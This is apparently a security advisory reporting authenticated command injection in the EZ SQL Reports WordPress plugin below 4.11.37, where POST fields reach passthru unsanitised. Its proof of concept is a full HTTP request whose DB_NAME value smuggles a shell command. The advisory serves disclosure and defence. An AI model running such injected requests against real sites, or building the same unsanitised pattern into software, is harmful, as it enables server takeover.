EZ SQL Reports < 4.11.37 – Authenticated Arbitrary Code Execution

Description

There are several calls to "passtthru" in the code, one of them is receiving the username, password, database name and host from the $_POST arguments, so you can inject in every of this parameter the ";" character or others like "&&" or "||" to execute other distinct commands to "/usr/bin/mysql".

Proof of Concept

POST /wp-admin/admin.php?page=ELISQLREPORTS-settings HTTP/1.1
Host: <wordpress web>
Proxy-Connection: keep-alive
Content-Length: 177
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://<wordpress web>
Upgrade-Insecure-Requests: 1
User-Agent: <the user agent>
Content-Type: application/x-www-form-urlencoded
Referer: http://<wordpress web>/wp-admin/admin.php?page=ELISQLREPORTS-settings
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.8,es;q=0.6
Cookie: wordpress_8fa[...etc...]b7d
 
DB_NAME=<the db
name>%3B+touch+testrce.txt%3B+&DB_HOST=127.0.0.1&DB_USER=<theuser>&DB_PASSWORD=<thepassword>&db_date=z.2015-08-27-20-22-29.manual.wp.127.0.0.1.sql.zip&db_nonce=au78c5ff86